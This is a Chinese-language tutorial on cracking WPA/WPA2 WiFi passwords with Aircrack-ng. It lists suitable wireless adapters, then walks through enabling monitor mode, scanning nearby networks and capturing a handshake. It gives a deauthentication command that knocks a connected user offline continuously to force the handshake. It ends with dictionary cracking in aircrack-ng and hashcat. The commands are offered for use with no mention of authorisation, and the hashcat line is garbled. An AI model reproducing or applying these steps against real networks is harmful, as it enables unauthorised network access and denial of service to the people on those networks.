Aircrack-ng是一个基于WiFi无线网络分析有关的安全软件,主要功能有网络侦测、数据包嗅探、WEP和WPA/WPA2-PSK破解等。
因为安全性的原因。现在,周围很少有用WEP算法来加密的WiFi密码,不过基本命令都很相似。
WiFi网络构成
(1)WiFi是一个建立于IEEE 802.11标准的无线局域网络(WLAN)设备。
(2)WiFi工作原理AP(Access Point 例如:无线路由器)每100ms将SSID(Service Set Identifier)经由beacons(信号台)封包广播一次。
一 准备合适的无线网卡
USB无线网卡
aircrack-ng官方推荐网卡
- Alfa AWUS036H [b/g USB]
- Ubiquiti SRC [a/b/g Cardbus]
- Ubiquiti SRX [a/b/g ExpressCard]
- Airpcap series [USB]
- TP-Link TL-WN722N v1 [b/g/n USB] - Beware, if version is not specified by vendor, it is NOT v1
- Alfa AWUS036NHA [b/g/n USB]
- Alfa AWUS051NH v2 [a/b/g/n USB]
- MiniPCIe: anything that uses ath9k, especially AR92xx and AR93xx (ability to do spectral scan)
二 具体步骤
启动网卡监听模式
iwconfig 查看网卡信息
一般默认网卡名称为 wlan0
airmon-ng start wlan0 启动监听模式
若再次输入iwconfig 可以看到网卡名称已变成wlan0mon
扫描WiFi网络
airodump-ng wlan0mon(网卡名称)
——扫描到的WiFi热点信息
BSSID:WiFi路由器的MAC地址
PWR:网卡报告信号水平,信号值越高说明离AP越近。(PWR=-1,网卡驱动不支持报告此项信息)
Beacons:无线AP发出的通告编号
#Data:被捕获到的数据分组的数量(一般数据量越大,抓取握手包更容易)
#/s:过去10秒钟内每秒捕获数据分组的数量
CH:信道号(从Beacon中获取)
MB:无线AP所支持的最大速率
ENC:加密算法体系
CIPHER:加密算法
AUTH:使用的认证协议
ESSID:wifi名称
BSSID :WiFi的MAC地址
STATION:连接前面WiFi的用户MAC地址
需要记录准备破解的WiFi MAC地址,已连接WiFi的用户MAC WiFi的信道号
(没有用户连接的WIFI不能抓取握手包,也就不能破解)
准备抓取握手包
airodump-ng -c [信道号] --bssid [apMAC] -w [保存的文件名] wlan0mon
airodump-ng -c --bssid -w wlan0mon
使已连接WiFi的用户A强制下线,之后A会向WiFi路由重新发送一个带密码的请求握手包
aireplay-ng -0 0(攻击数据包数量,为0代表一直攻击) -a [ WiFi MAC地址] -c [ 用户 MAC地址] wlan0mon
成功之后的暴力破解
利用字典 aircrack-ng (保存的文件名.cap)-w (字典的绝对路径)
关于密码破解,可以使用kali自带的hashcat使效率大大增加
转换握手包格式为hccap(hccapx)
aircrack-ng (抓取到的握手包文件名) -J (转换后的文件名)
开始破解
hashcat
-
m
2500
.hccap password.txt
参数: -m 2500为破解的模式为WPA/PSK方式 hccap格式的文件是刚刚转化好的文件 字典文件
注:最新版hashcat一般情况下不支持hccap格式,第一步需将握手包cap格式转换为hccapx